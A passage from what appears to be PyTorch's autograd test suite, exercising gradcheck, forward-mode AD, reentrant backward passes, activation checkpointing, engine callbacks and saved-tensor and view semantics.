jacobians, _, _, _ = get_analytical_jacobian((a,), outputs, grad_out=2.0)
def test_gradcheck_custom_error(self):
from torch.autograd.gradcheck import GradcheckError
def check(fast_mode):
def fn(x):
y = x.clone()
y.register_hook(lambda x: x + 1e-2)
return y
x = torch.ones(2, 2, requires_grad=True)
with self.assertRaisesRegex(GradcheckError, 'Jacobian mismatch for output 0 with respect to input 0'):
gradcheck(fn, (x,), fast_mode=fast_mode)
with self.assertRaisesRegex(RuntimeError, 'Jacobian mismatch for output 0 with respect to input 0'):
gradcheck(fn, (x,), fast_mode=fast_mode)
self.assertFalse(gradcheck(fn, (x,), raise_exception=False, fast_mode=fast_mode))
def fn2(x):
raise RuntimeError("Not a GradcheckError!")
# Checks that when raise_exception=False, non-GradcheckErrors are not caught by gradcheck
with self.assertRaisesRegex(RuntimeError, "Not a GradcheckError!"):
gradcheck(fn2, (x,), fast_mode=fast_mode, raise_exception=False)
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_forward_ad(self):
def fn(x, y):
return x + y, y
def bad_fn(x, y):
# Hacky way to check if we're currently inside a forward ad level
is_running_forward_ad = fwAD._current_level >= 0
if is_running_forward_ad:
y_p, y_d = fwAD.unpack_dual(y)
y = fwAD.make_dual(y_p, y_d * 1.1)
return x + y, y
err_msg = "Jacobian computed with forward mode mismatch for output 0 with respect to input 1"
for fast_mode in [True, False]:
# Test for all inputs and outputs being real
x = torch.rand(2, dtype=torch.double, requires_grad=True)
y = torch.rand(2, dtype=torch.double, requires_grad=True)
gradcheck(fn, (x, y), check_forward_ad=True, fast_mode=fast_mode)
with self.assertRaisesRegex(RuntimeError, err_msg):
gradcheck(bad_fn, (x, y), check_forward_ad=True, fast_mode=fast_mode)
def basic_mul(x):
return torch.view_as_real(torch.resolve_conj(x * 1j))
gradcheck(basic_mul, x, check_forward_ad=True, fast_mode=fast_mode)
# Test for one input and one output being complex
x = torch.rand(2, dtype=torch.cdouble, requires_grad=True)
gradcheck(fn, (x, y), check_forward_ad=True, fast_mode=fast_mode)
with self.assertRaisesRegex(RuntimeError, err_msg):
gradcheck(bad_fn, (x, y), check_forward_ad=True, fast_mode=fast_mode)
# Test for all inputs and outputs being complex
y = torch.rand(2, dtype=torch.cdouble, requires_grad=True)
gradcheck(fn, (x, y), check_forward_ad=True, fast_mode=fast_mode)
with self.assertRaisesRegex(RuntimeError, err_msg):
gradcheck(bad_fn, (x, y), check_forward_ad=True, fast_mode=fast_mode)
def test_gradcheck_check_forward_or_backward_only(self):
"""Depending on settings for check_forward_ad and check_backward_ad, the
correct codepaths should be reached (or not reached)
"""
fwd_fail_err_msg = "FAIL FWD"
bwd_fail_err_msg = "FAIL BWD"
class UserFn(Function):
@staticmethod
def forward(ctx, foo, fwd_bad, bwd_bad):
ctx.fwd_bad = fwd_bad
ctx.bwd_bad = bwd_bad
return foo * 2
@staticmethod
def vjp(ctx, gO):
if ctx.bwd_bad:
raise RuntimeError(bwd_fail_err_msg)
else:
return 2 * gO, None, None
@staticmethod
def jvp(ctx, gI, _1, _2):
if ctx.fwd_bad:
raise RuntimeError(fwd_fail_err_msg)
else:
return 2 * gI
for fast_mode in (True, False):
for check_forward_ad in (True, False):
for check_backward_ad in (True, False):
for fwd_bad in (True, False):
for bwd_bad in (True, False):
fwd_should_fail = fwd_bad and check_forward_ad
bwd_should_fail = bwd_bad and check_backward_ad
def run():
gradcheck(UserFn.apply, (x, fwd_bad, bwd_bad), check_forward_ad=check_forward_ad,
check_backward_ad=check_backward_ad, check_undefined_grad=check_backward_ad,
check_batched_grad=check_backward_ad, fast_mode=fast_mode)
x = torch.rand(2, dtype=torch.double, requires_grad=True)
if not check_forward_ad and not check_backward_ad:
with self.assertRaisesRegex(AssertionError, "Expected at least one of"):
run()
continue
if not fwd_should_fail and not bwd_should_fail:
run()
else:
# If both fail, backward AD failure "hides" forward AD failure
if fwd_should_fail:
fail_msg = fwd_fail_err_msg
if bwd_should_fail:
fail_msg = bwd_fail_err_msg
with self.assertRaisesRegex(RuntimeError, fail_msg):
run()
def test_gradcheck_forward_ad_batched_grad(self):
x = torch.rand(2, dtype=torch.double, requires_grad=True)
# multiple inputs and outputs with non-tensors inputs
def fn1(a: torch.Tensor, b: int):
return a.clone(), a + 1
gradcheck(fn1, (x, 1), check_forward_ad=True, check_backward_ad=False, check_batched_grad=False,
check_undefined_grad=False, check_batched_forward_grad=True)
# unrelated inputs: tangent for c is None
def fn2(a: torch.Tensor, c: torch.Tensor):
return a.clone()
gradcheck(fn2, (x, x.clone()), check_forward_ad=True, check_backward_ad=False, check_batched_grad=False,
check_undefined_grad=False, check_batched_forward_grad=True)
class Fn(Function):
@staticmethod
def forward(ctx, foo):
return foo * 2
@staticmethod
def vjp(ctx, gO):
return gO * 2
@staticmethod
def jvp(ctx, gI):
torch.randn_like(gI)
return gI * 2
msg = "vmap: We do not yet support calling random operations inside of vmap"
with self.assertRaisesRegex(RuntimeError, msg):
gradcheck(Fn.apply, (x,), check_forward_ad=True, check_batched_forward_grad=True)
def test_version_counter(self):
x = torch.randn(1, 2)
# In-place op bumps version
x_saved_version = x._version
x.add_(1).add_(1)
self.assertTrue(x._version > x_saved_version)
# Differentiable view shares version counter
xz = x[:]
self.assertTrue(x._version == xz._version)
xz.add_(1)
self.assertTrue(x._version == xz._version)
# `x.data = y` preserves version counter of `x`
x_saved_version = x._version
x.data = torch.randn(2, 3)
self.assertTrue(x._version == x_saved_version)
x.add_(1)
self.assertTrue(x._version > x_saved_version)
# Make sure `x` is still using the same version counter it shares with `xz`
self.assertTrue(x._version == xz._version)
# In-place op on `xz` also updates version of `x`,
# because they share the version counter
xz.add_(1)
self.assertTrue(x._version == xz._version)
def test_set_data_tensorimpl_type(self):
# Dense tensor has impl of type `TensorImpl`, while sparse tensor has impl
# of type `SparseTensorImpl`.
x = torch.randn(1, 2)
x_s = torch.sparse_coo_tensor(torch.zeros([1, 1]), torch.ones([1]))
with self.assertRaisesRegex(RuntimeError, 'incompatible tensor type'):
x.data = x_s
def test_set_data_preserve_pyobj(self):
a = torch.randn(1, 2)
b = torch.randn(1, 2)
b_id_saved = id(b)
b.data = a
self.assertTrue(b_id_saved == id(b))
@unittest.skipIf(IS_WINDOWS, "Skipping because doesn't work for windows")
def test_thread_shutdown(self):
code = """import torch
from torch.autograd import Function
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, grad):
return grad
for shape in [(1,), ()]:
v = torch.ones(shape, requires_grad=True)
MyFunction.apply(v).backward()
"""
s = TestCase.runWithPytorchAPIUsageStderr(code)
self.assertRegex(s, "PYTORCH_API_USAGE torch.autograd.thread_shutdown")
@unittest.skipIf(IS_MACOS, "Fails with SIGBUS on macOS; https://github.com/pytorch/pytorch/issues/25941")
def test_deep_reentrant(self):
class DeepReentrant(Function):
@staticmethod
def forward(ctx, x):
with torch.enable_grad():
ctx.x = Variable(x.detach(), requires_grad=True)
ctx.x = ctx.x - 1
return ctx.x.detach()
@staticmethod
def backward(ctx, x):
if ctx.x < 0:
return x
with torch.enable_grad():
DeepReentrant.apply(ctx.x).sum().backward()
return x
# Test stack overflow escape mechanism
v = torch.tensor(2000.0, requires_grad=True)
# This will cause stack overflow if reentrant calls are handled
# in the same thread recursively
DeepReentrant.apply(v).sum().backward()
# Test stack overflow escape mechanism multiple times
# to ensure reusing workers in the pool works fine
v2 = torch.tensor(200.0, requires_grad=True)
DeepReentrant.apply(v2).sum().backward()
def test_reentrant_priority(self):
order = []
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, x):
order.append("MyFunction")
return x
class Reentrant(Function):
@staticmethod
def forward(ctx, x):
with torch.enable_grad():
ctx.x = Variable(x.detach(), requires_grad=True)
ctx.x = ctx.x - 1
return ctx.x.detach()
@staticmethod
def backward(ctx, x):
order.append("Reentrant")
if ctx.x < 0:
return x
with torch.enable_grad():
Reentrant.apply(ctx.x).backward()
return x
a = MyFunction.apply(torch.tensor(6.0, requires_grad=True))
b = Reentrant.apply(torch.tensor(9.0, requires_grad=True))
v = a * b
v.backward()
# The tasks for the Reentrant and MyFunction backward() will be added
# to the queue in the autograd engine at the same time. The backward
# for Reentrant will be executed first, which will then add other
# backward tasks to the queue. We want to ensure all the reentrant tasks
# are prioritized over the MyFunction backward task regardless of their
# sequence numbers
self.assertEqual(len(order), 11)
self.assertEqual(order.count("Reentrant"), 10)
self.assertEqual(order[-1], "MyFunction")
@slowTest
def test_checkpointing(self):
num_inp = 2000
nz_inp = 10
nz_out = 10
nz_bottleneck = 1000
# small proxy network for some complex reasoning we want to do per input
module = nn.Sequential(
nn.Linear(nz_inp, nz_bottleneck),
nn.ReLU(),
nn.Linear(nz_bottleneck, nz_inp)
)
feat_combined = []
for r in range(num_inp):
data_r = torch.empty(1, nz_inp)
data_r.uniform_()
data_r.requires_grad = True
feat_r = checkpoint(module, data_r)
feat_combined.append(feat_r)
# compute mean as a proxy for some joint reasoning
mean_combined = torch.stack(feat_combined).mean()
mean_combined.backward()
@slowTest
@parametrize("input_requires_grad", [True, False])
def test_checkpointing_without_reentrant(self, input_requires_grad):
"""
Basic test for checkpoint without reentrant autograd.
"""
num_inp = 2000
nz_inp = 10
nz_out = 10
nz_bottleneck = 1000
# small proxy network for some complex reasoning we want to do per input
module = nn.Sequential(
nn.Linear(nz_inp, nz_bottleneck),
nn.ReLU(),
nn.Linear(nz_bottleneck, nz_inp)
)
# Run model with and without checkpointing and verify gradients are
# equivalent, regardless of if inputs require grads or not.
module_copy = deepcopy(module)
feat_combined = []
feat_combined_no_checkpoint = []
for r in range(num_inp):
data_r = torch.empty(1, nz_inp)
data_r.uniform_()
data_r.requires_grad = input_requires_grad
data_r_copy = data_r.clone()
feat_r = checkpoint(module, data_r, use_reentrant=False)
feat_combined.append(feat_r)
feat_r_no_checkpoint = module_copy(data_r)
feat_combined_no_checkpoint.append(feat_r_no_checkpoint)
# compute mean as a proxy for some joint reasoning
mean_combined = torch.stack(feat_combined).mean()
mean_combined.backward()
mean_combined_no_checkpoint = torch.stack(feat_combined_no_checkpoint).mean()
mean_combined_no_checkpoint.backward()
for checkpoint_param, param in zip(module.parameters(), module_copy.parameters()):
self.assertEqual(checkpoint_param.grad, param.grad)
def test_checkpoint_valid_reset_on_error(self):
a = torch.randn(2, 2, requires_grad=True)
with self.assertRaisesRegex(Exception, "Checkpointing is not compatible with .grad()"):
b = checkpoint(torch.exp, a).sum()
torch.autograd.grad(b, (a,))
c = checkpoint(torch.exp, a).sum()
c.backward()
@parametrize("use_reentrant", [True, False])
def test_checkpointing_without_reentrant_detached_tensor(self, use_reentrant):
class NoGradModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.linear = nn.Linear(2, 2, bias=False)
self.lin2 = nn.Linear(2, 2, bias=False)
def forward(self, x):
with torch.no_grad():
return self.lin2(self.linear(x))
module = NoGradModule()
err_ctx = (
self.assertRaisesRegex(
RuntimeError,
"none of output has requires_grad=True"
)
if use_reentrant
else contextlib.suppress()
)
a = torch.randn(2, 2, requires_grad=True)
for _ in range(3):
with err_ctx:
# out does not require grad
out = checkpoint(module, a, use_reentrant=use_reentrant)
# Make loss require grad, otherwise we would run into
# "element 0 of tensors does not require grad and does not have a grad_fn"
out += a
out.sum().backward()
def test_checkpointing_without_reentrant_correct_grad(self):
"""
Verifies that correct gradients are calculated for checkpoint
without reentrant autograd, for both backward() and autograd.grad().
"""
a = torch.randn(2, 2, requires_grad=True)
b = torch.exp(a).sum()
b.backward()
b_grad = a.grad
a.grad = None
c = checkpoint(torch.exp, a, use_reentrant=False).sum()
c.backward()
c_grad = a.grad
a.grad = None
d = checkpoint(torch.exp, a, use_reentrant=False).sum()
d_grad, = torch.autograd.grad(d, (a,))
self.assertEqual(b_grad, c_grad)
self.assertEqual(b_grad, d_grad)
def test_checkpointing_without_reentrant_dataparallel(self):
"""
Verifies gradient correctness when checkpoint without reentrant autograd
is used in conjunction with DataParallel.
"""
class LinearModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.linear = nn.Linear(2, 2, bias=False)
def forward(self, inp):
return self.linear(inp)
a = torch.randn(2, 2, requires_grad=True)
if torch.cuda.is_available():
a = a.cuda()
model = LinearModule()
if torch.cuda.is_available():
model = model.cuda()
b = deepcopy(model)(a).sum()
b.backward()
b_grad = a.grad
a.grad = None
module = torch.nn.DataParallel(deepcopy(model))
c = checkpoint(module, a, use_reentrant=False).sum()
c.backward()
c_grad = a.grad
self.assertEqual(b_grad, c_grad)
def test_checkpointing_without_reentrant_parameter_used_in_an_out(self):
"""
Ensures that gradient hooks are only called once per tensor.
"""
w = torch.randn(10, 10, requires_grad=True)
count = 0
def hook(grad):
nonlocal count
count += 1
w.register_hook(hook)
x = torch.rand(10, 10, requires_grad=True)
h = w * x # Using w outside the checkpoint
out = checkpoint(lambda x: w * x, h, use_reentrant=False) # Using w inside the checkpoint
out.sum().backward()
# should only call hook once
self.assertEqual(count, 1)
def test_checkpointing_without_reentrant_arbitrary_input_output(self):
"""
Ensures checkpointing without reentrant autograd works with functions
with arbitrary input/output structures.
"""
class MyModel(torch.nn.Module):
def __init__(self):
super().__init__()
self.layer = torch.nn.Linear(5, 5, bias=False)
def forward(self, dict_input):
tensor = dict_input["tensor"]
return {
"result": self.layer(tensor)
}
model_no_checkpoint = MyModel()
model_checkpoint_without_reentrant = deepcopy(model_no_checkpoint)
inp = {
"tensor": torch.randn(5, 5)
}
out_no_checkpoint = model_no_checkpoint(inp)["result"].sum()
out_checkpoint = checkpoint(
model_checkpoint_without_reentrant,
inp,
use_reentrant=False
)["result"].sum()
self.assertEqual(out_checkpoint, out_no_checkpoint)
out_no_checkpoint.backward()
out_checkpoint.backward()
for param, checkpoint_param in zip(model_no_checkpoint.parameters(), model_checkpoint_without_reentrant.parameters()):
self.assertEqual(param.grad, checkpoint_param.grad)
def test_callback_adds_callback(self):
called = [0]
def callback_final():
called[0] += 1
def callback_adds_callback():
called[0] += 1
Variable._execution_engine.queue_callback(callback_final)
class MyFunc(Function):
@staticmethod
def forward(ctx, input):
return input
@staticmethod
@once_differentiable
def backward(ctx, grad):
Variable._execution_engine.queue_callback(callback_adds_callback)
return grad
a = torch.rand((3, 3), requires_grad=True)
b = MyFunc.apply(a)
b.sum().backward()
self.assertEqual(called[0], 2)
def _test_reentrant_with_callbacks(self, install_callbacks_in_depths):
counter = {}
counter["inner"] = 0
counter["outer"] = 0
def inc_inner_counter():
counter["inner"] += 1
def inc_outer_counter():
counter["outer"] += 1
class MyFunc(Function):
@staticmethod
def forward(ctx, input):
return input
@staticmethod
@once_differentiable
def backward(ctx, input):
if 1 in install_callbacks_in_depths:
# Add a callback to execute.
Variable._execution_engine.queue_callback(inc_inner_counter)
return input
class MyReentrantFunc(Function):
@staticmethod
def forward(ctx, input):
return input
@staticmethod
@once_differentiable
def backward(ctx, input):
if 0 in install_callbacks_in_depths:
# Add a callback to execute.
Variable._execution_engine.queue_callback(inc_outer_counter)
# Reentrant backward call.
tmp_inp = input.detach().requires_grad_()
with torch.enable_grad():
tmp_out = (MyFunc.apply(tmp_inp)).sum()
tmp_out.backward()
return input
t1 = torch.rand((3, 3), requires_grad=True)
t2 = MyReentrantFunc.apply(t1)
t3 = t2.sum()
torch.autograd.backward([t3])
return counter
def test_reentrant_with_callbacks_depth_0(self):
# Verify callback is called only once.
ret = self._test_reentrant_with_callbacks([0])
self.assertEqual(1, ret["outer"])
self.assertEqual(0, ret["inner"])
def test_reentrant_with_callbacks_depth_1(self):
# Verify callback is called only once.
ret = self._test_reentrant_with_callbacks([1])
self.assertEqual(0, ret["outer"])
self.assertEqual(1, ret["inner"])
def test_reentrant_with_callbacks_both_depths(self):
# Verify callback is called twice.
ret = self._test_reentrant_with_callbacks([0, 1])
self.assertEqual(1, ret["outer"])
self.assertEqual(1, ret["inner"])
def test_reentrant_with_leaf_variable_hook(self):
handle = None
param = torch.rand(10, requires_grad=True)
def add_gradient_penalty_to_grad(grad):
handle.remove()
old_param_grad = grad
param.grad = None
# Add some sort of gradient penalty by directly updating the gradients
with torch.enable_grad():
g = grad.detach().requires_grad_()
new_param = param.detach().requires_grad_()
out = ((g * 2) + new_param).sum()
out.backward()
res = g.grad + grad
param.grad = old_param_grad
return res
handle = param.register_hook(add_gradient_penalty_to_grad)
# Forward pass
tmp = (param * param)
loss = tmp.sum()
# Compute the gradients
loss.backward()
def test_reentrant_with_non_leaf_variable_hook(self):
handle = None
param = torch.rand(10, requires_grad=True)
def manual_increase_gradient(grad):
handle.remove()
# Add some sort of gradient penalty by directly updating the gradients
with torch.enable_grad():
g = grad.detach().requires_grad_()
out = ((g * 2) + 5).sum()
out.backward()
res = g.grad + grad
return res
# Forward pass
tmp = (param * param)
handle = tmp.register_hook(manual_increase_gradient)
loss = tmp.sum()
# Compute the gradients
loss.backward()
self.assertEqual(param.grad, 6 * param)
def test_grad_fn_attr_bindings(self):
# Check that the getter of each type returns what we want
# See `gen_autograd_functions.py` for how the getters are generated
#
# This test is only meant to check if the codegen'd bindings work
# Please help update this test if you update the names of any the fields we check!
#
a = torch.ones(1, requires_grad=True)
b = torch.ones(1, requires_grad=True)
out = torch.stack([a, b], dim=0)
self.assertEqual(out.grad_fn._saved_tensors, (a, b)) # TensorList -> Tuple[Tensor]
self.assertIsInstance(out.grad_fn._saved_tensors[0], torch.Tensor)
self.assertIsInstance(out.grad_fn._raw_saved_tensors[0], torch._C._autograd.SavedTensor)
self.assertEqual(out.grad_fn._saved_dim, 0) # int64_t -> int
self.assertIsInstance(out.grad_fn._saved_dim, int)
out.grad_fn._raw_saved_tensors[0].register_hooks(lambda x: x, lambda x: x)
out.sum().backward()
with self.assertRaisesRegex(RuntimeError, "after they have already been freed"):
out.grad_fn._saved_tensors
with self.assertRaisesRegex(RuntimeError, "after they have already been freed"):
out.grad_fn._raw_saved_tensors
self.assertEqual(out.grad_fn._saved_dim, 0)
a = torch.ones(2, 2, requires_grad=True)
indices = torch.tensor([0, 1])
out = a[:, indices]
self.assertEqual(out.grad_fn._saved_indices, (None, indices)) # c10::List<c10::optional<Tensor>> -> Tuple[Tensor?]
self.assertIsInstance(out.grad_fn._saved_indices[1], torch.Tensor)
self.assertIsInstance(out.grad_fn._raw_saved_indices[1], torch._C._autograd.SavedTensor)
self.assertEqual(out.grad_fn._saved_self_sizes, a.shape) # IntArrayRef -> Tuple[int]
self.assertIsInstance(out.grad_fn._saved_self_sizes[0], int)
out.grad_fn._raw_saved_indices[1].register_hooks(lambda x: x, lambda x: x)
with self.assertRaisesRegex(RuntimeError, "None is forbidden"):
out.grad_fn._raw_saved_indices[0].register_hooks(lambda x: x, lambda x: x)
a = torch.ones(2, 2, requires_grad=True)
out = a * a
out.grad_fn._raw_saved_self.register_hooks(lambda x: x, lambda x: x)
out.sum().backward()
with self.assertRaisesRegex(RuntimeError, "after it has been freed"):
out.grad_fn._raw_saved_self.register_hooks(lambda x: x, lambda x: x)
a = torch.ones(1, 1, 2, requires_grad=True)
out = torch.nn.functional.interpolate(a, 4, mode="linear")
self.assertEqual(out.grad_fn._saved_output_size, (4,)) # c10::optional<IntArrayRef> -> int[]?
self.assertIsInstance(out.grad_fn._saved_output_size[0], int)
self.assertEqual(out.grad_fn._saved_align_corners, False) # bool -> bool
self.assertIsInstance(out.grad_fn._saved_align_corners, bool)
self.assertIsNone(out.grad_fn._saved_scale_factors) # c10::optional<ArrayRef<double>> -> float[]?
out = torch.nn.functional.interpolate(a, scale_factor=0.5, mode="linear")
self.assertIsNone(out.grad_fn._saved_output_size)
self.assertEqual(out.grad_fn._saved_scale_factors, (0.5,))
self.assertIsInstance(out.grad_fn._saved_scale_factors[0], float)
a = torch.ones(2, 2, requires_grad=True)
out = torch.pdist(a, p=1)
self.assertEqual(out.grad_fn._saved_p, 1.) # double -> float
self.assertIsInstance(out.grad_fn._saved_p, float)
a = torch.ones(1, 1, 2, requires_grad=True)
out = torch.logit(a, 1.)
self.assertEqual(out.grad_fn._saved_eps, 1.) # c10:optional<double> -> float?
self.assertIsInstance(out.grad_fn._saved_eps, float)
out = torch.logit(a)
self.assertIsNone(out.grad_fn._saved_eps)
if torch._C.has_lapack:
a = torch.ones(1, 1, requires_grad=True)
q, r = torch.linalg.qr(a, mode="reduced")
self.assertEqual(q.grad_fn._saved_mode, "reduced") # std::string -> str
a = torch.tensor([1.], requires_grad=True)
out = torch.div(a, 2., rounding_mode="trunc")
self.assertEqual(out.grad_fn._saved_rounding_mode, "trunc") # c10::optional<std::string> -> str?
out = torch.div(a, 2., rounding_mode=None)
self.assertIsNone(out.grad_fn._saved_rounding_mode) # c10::optional<std::string> -> str?
x = torch.zeros(5, requires_grad=True)
out = torch.threshold(x, threshold=(1 + 0j), value=(1 + 0j))
self.assertIsInstance(out.grad_fn._saved_threshold, complex) # Scalar(complex double) -> complex
cfloat = torch.tensor(1 + 0j, dtype=torch.complex64)
out = torch.threshold(x, threshold=cfloat, value=(1 + 0j))
self.assertIsInstance(out.grad_fn._saved_threshold, complex) # Scalar(complex float) -> complex
out = torch.threshold(x, threshold=1., value=1.)
self.assertIsInstance(out.grad_fn._saved_threshold, float) # Scalar(floating point) -> float
out = torch.threshold(x, threshold=1, value=1)
self.assertIsInstance(out.grad_fn._saved_threshold, int) # Scalar(integral) -> int
out = torch.threshold(x, threshold=False, value=False)
self.assertIsInstance(out.grad_fn._saved_threshold, bool) # Scalar(bool) -> bool
a = torch.ones(2, 2, requires_grad=True)
out = a.as_strided((3,), (1,), 1)
self.assertEqual(out.grad_fn._saved_storage_offset, 1) # c10:optional<int64_t> -> int?
self.assertIsInstance(out.grad_fn._saved_storage_offset, int)
out = a.as_strided((3,), (1,))
self.assertIsNone(out.grad_fn._saved_storage_offset)
a = torch.ones(2, requires_grad=True)
out = torch.tanh(a)
self.assertEqual(out, out.grad_fn._saved_result) # saved variable when output
a = torch.randn(3, 5, requires_grad=True)
b = torch.tensor([1, 0, 4])
loss = nn.NLLLoss()
out = loss(a, b)
self.assertIsNone(out.grad_fn._saved_weight)
loss = nn.NLLLoss(weight=torch.ones((5,)))
out = loss(a, b)
self.assertEqual(out.grad_fn._saved_weight, torch.ones((5,))) # c10:optional<Tensor> -> Tensor?
out.sum().backward()
with self.assertRaisesRegex(RuntimeError, "after they have already been freed"):
out.grad_fn._saved_weight
def test_cant_create_saved_tensors(self):
with self.assertRaisesRegex(RuntimeError, "Trying to create a SavedTensor object from Python is forbidden"):
torch.autograd.SavedTensor()
def test_custom_function_saved_tensors(self):
def getFn(save=True):
class MyFn(Function):
@staticmethod
def forward(ctx, x):
if save:
ctx.save_for_backward(x, None)
return x
@staticmethod
def backward(ctx, g):
return g
return MyFn
a = torch.randn(5, requires_grad=True)
y = getFn(True).apply(a)
self.assertEqual((a, None), y.grad_fn.saved_tensors)
saved = y.grad_fn._raw_saved_tensors
self.assertIsInstance(saved[0], torch._C._autograd.SavedTensor)
# We can't tell the underlying tensor is None without unpacking it
self.assertIsInstance(saved[1], torch._C._autograd.SavedTensor)
# We catch that error when the user calls register_hooks on it
with self.assertRaisesRegex(RuntimeError, "None is forbidden"):
saved[1].register_hooks(lambda x: x, lambda x: x)
with self.assertRaisesRegex(TypeError, "incompatible function arguments"):
saved[0].register_hooks(lambda x: x)
with self.assertRaisesRegex(TypeError, "incompatible function arguments"):
saved[0].register_hooks(1, 1)
saved[0].register_hooks(lambda x: x, lambda x: x)
with self.assertRaisesRegex(RuntimeError, "already been set"):
saved[0].register_hooks(lambda x: x, lambda x: x)
y.sum().backward()
# Using a reference to the SavedTensor object after the
# saved variables have been released can lead to undefined behavior
del saved
with self.assertRaisesRegex(RuntimeError, "after they have already been freed"):
y.grad_fn._raw_saved_tensors
with self.assertRaisesRegex(RuntimeError, "after they have already been freed"):
y.grad_fn.saved_tensors
y = getFn(False).apply(a)
self.assertEqual(y.grad_fn.saved_tensors, ())
self.assertEqual(y.grad_fn._raw_saved_tensors, ())
def test_autograd_views_codegen(self):
# This is not necessarily the absolute correct behavior, but this is the current
# one. This test is here to make sure that any change to this behavior is detected
# and not silent. The TODOs below mark the places with unexpected behavior.
# Note that any change in these test will be BC-breaking and should be done carefully.
# This test checks the behavior of two codegen functions (view_as and unbind)
# with respect to view tracking and inplace operation on the output.
def run_test(grad_mode, requires_grad, is_view, should_raise_tuple):
def maybe_check_raise(fn, should_raise):
self.assertTrue(should_raise is None or isinstance(should_raise, str))
if should_raise is not None:
with self.assertRaisesRegex(RuntimeError, should_raise):
fn()
else:
fn()
inp = torch.rand(2, requires_grad=requires_grad).clone()
with torch.set_grad_enabled(grad_mode):
out = inp.view_as(inp)
# Are they differentiable views?
self.assertTrue(out._is_view() == is_view)
# Are inplace allowed?
maybe_check_raise(lambda: out.add_(1), should_raise_tuple[0])
inp = torch.rand(2, requires_grad=requires_grad).clone()
with torch.set_grad_enabled(grad_mode):
out = inp.unbind()
# Are they differentiable views?
self.assertTrue(out[0]._is_view() == is_view)
self.assertTrue(out[1]._is_view() == is_view)
# Are inplace allowed?
maybe_check_raise(lambda: out[0].add_(1), should_raise_tuple[1])
maybe_check_raise(lambda: out[1].add_(1), should_raise_tuple[2])
# should_raise contains None if it should not raise
# should_raise contains a string of the error if it should raise
# The 3 elements are for view_as, first output of unbind and second output of unbind
run_test(grad_mode=True, requires_grad=False, is_view=True,
should_raise_tuple=(None, None, None))
inp_change_err = "Output {} of UnbindBackward0 is a view and is being modified inplace."
run_test(grad_mode=True, requires_grad=True, is_view=True,
should_raise_tuple=(None, inp_change_err.format("0"), inp_change_err.format("1")))
leaf_grad_err = "A view was created in no_grad mode and is being modified inplace"
run_test(grad_mode=False, requires_grad=True, is_view=True,
should_raise_tuple=(leaf_grad_err, leaf_grad_err, leaf_grad_err))
run_test(grad_mode=False, requires_grad=False, is_view=True,
should_raise_tuple=(None, None, None))
def test_inplace_not_requires_grad(self):
class MyFn(torch.autograd.Function):
@staticmethod
def forward(ctx, inp):
return inp.view_as(inp)
@staticmethod
def backward(ctx, grad):
return grad
# Original Tensor does not require grad
a = torch.rand(1, 2)
# Tensor being written does require grad
b = torch.rand(1, requires_grad=True)
# Take an invalid view on 'a' that should raise an error (warns during deprecation)
view_a = MyFn.apply(a)
with self.assertRaisesRegex(RuntimeError, "This view was created inside a custom Function"):
view_a += b
# Extra test for copy_ that is a manual implementation and could be easily
# forgotten when the codegen is updated (warns during deprecation)
a = torch.rand(1, 2)
b = torch.rand(1, requires_grad=True)
view_a = MyFn.apply(a)
with self.assertRaisesRegex(RuntimeError, "This view was created inside a custom Function"):
view_a.copy_(b)
# Functions that should throw must properly throw
a = torch.rand(1, 2)
b = torch.rand(1, requires_grad=True)
view_a = a.unbind()[0]
with self.assertRaisesRegex(RuntimeError, "This view is the output of a function that returns "
"multiple views."):
view_a.copy_(b)
# Sanity check that views that should work still work
a = torch.rand(1, 2)
b = torch.rand(1, requires_grad=True)
a.select(1, 0).copy_(b)
def _do_test_autograd_simple_views_python(self, dtype):
# This is not necessarily the absolute correct behavior, but this is the current
# one. This test is here to make sure that any change to this behavior is detected
# and not silent. The TODOs below mark the places with unexpected behavior.
# Note that any change in these test will be BC-breaking and should be done carefully.
# This checks the autograd.Function behavior when we return one or multiple outputs
# while one of these is an input, a view of an input or of a temporary tensor.
# This indicator is used to track how many times the backward function was called
bw_called = [0]
# This indicator is used to check if the argument `ga` contains non-zero values
ga_nz = [False]
class IdOneOutput(Function):
@staticmethod
def forward(ctx, a, b, make_view):
if make_view:
a = a.narrow(0, 0, 2)
else:
a = a.clone()
return a
@staticmethod
def backward(ctx, ga):
bw_called[0] += 1
return ga, None, None
class IdTwoOutput(Function):
@staticmethod
def forward(ctx, a, b, make_view):
if make_view:
a = a.narrow(0, 0, 2)
else:
a = a.clone()
return a, a + b
@staticmethod
def backward(ctx, ga, gab):
bw_called[0] += 1
if ga.eq(0).all():
ga_nz[0] = False
else:
ga_nz[0] = True
return ga + gab, gab, None
class ViewOfTemp(Function):
@staticmethod
def forward(ctx, a, make_view):
ctx.save_for_backward(a)
if make_view:
a = a.narrow(0, 0, 2)
else:
a = a.clone()
b = a.clone()
return b.select(0, 0)
@staticmethod
def backward(ctx, grad):
bw_called[0] += 1
a, = ctx.saved_tensors
res = torch.zeros_like(a)
res.select(0, 0).copy_(grad)
return res, None
fn_id_to_inplace_on_view_err_msg = {
"one_output": ("Output 0 of IdOneOutputBackward is a view and is being "
"modified inplace. This view was created inside a custom Function"),
"two_output": ("Output 0 of IdTwoOutputBackward is a view and is being modified inplace."
" This view is the output of a function that returns multiple views."),
"view_of_temp": ("Output 0 of ViewOfTempBackward is a view and is being "
"modified inplace. This view was created inside a custom Function")
}
for fn_id in ["one_output", "two_output", "view_of_temp"]:
for inplace in [True, False]:
for make_view in [True, False]:
# Used for special casing the tests below
output_is_a_view = (make_view or fn_id == "view_of_temp")
def fn(a, b):
# never modify a, b inplace for gracheck
a = a.clone()
b = b.clone()
if fn_id == "two_output":
tmp1, tmp2 = IdTwoOutput.apply(a, b, make_view)
if inplace:
tmp1 += 3
tmp2 += 3
else:
tmp1 = tmp1 + 3
tmp2 = tmp2 + 3
tmp = tmp1 * tmp2
else:
if fn_id == "one_output":
tmp = IdOneOutput.apply(a, b, make_view)
else:
tmp = ViewOfTemp.apply(a + b, make_view)
if inplace:
tmp += 3
else:
tmp = tmp + 3
return tmp.sum()
a = torch.ones(2, dtype=dtype, requires_grad=True)
b = torch.ones(2, dtype=dtype, requires_grad=True)
err_msg = fn_id_to_inplace_on_view_err_msg[fn_id]
if not inplace or not output_is_a_view:
gradcheck(fn, (a, b), check_batched_grad=False)
# Was the custom backward called properly
bw_called[0] = 0
